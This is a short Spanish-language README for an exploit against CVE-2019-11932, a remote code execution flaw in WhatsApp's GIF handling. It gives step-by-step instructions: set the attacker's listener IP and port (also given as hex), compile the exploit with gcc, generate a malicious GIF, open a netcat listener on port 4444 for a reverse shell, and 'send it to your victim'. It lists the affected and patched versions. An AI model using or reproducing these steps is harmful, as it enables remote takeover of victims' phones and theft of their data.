
Exploit para CVE-2019-11932, una vulnerabilidad de ejecución remota de código en GIF de WhatsApp. Compile y ejecute para activar el exploit y obtener una reverse shell.
Modifique la dirección de escucha (la del atacante) así como el puerto de escucha en el archivo exploit.c
Código hexadecimal siguiente :
3139 322e 3136
382e 322e 3732 2034 3434 3420
Compile el código :
gcc -o exploit egif_lib.c exploit.c
Ejecute el archivo compilado ./exploit exploit.gif
copie/pegue la salida en un gif
Inicie el listener de netcat :
nc -lvp 4444
¡Envíe a su víctima!
Versiones afectadas: 2.19.230 y anteriores
Oficialmente parcheado en la versión 2.19.244
Source : https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/
Linkedin : https://www.linkedin.com/in/thomas-lounis-749456175/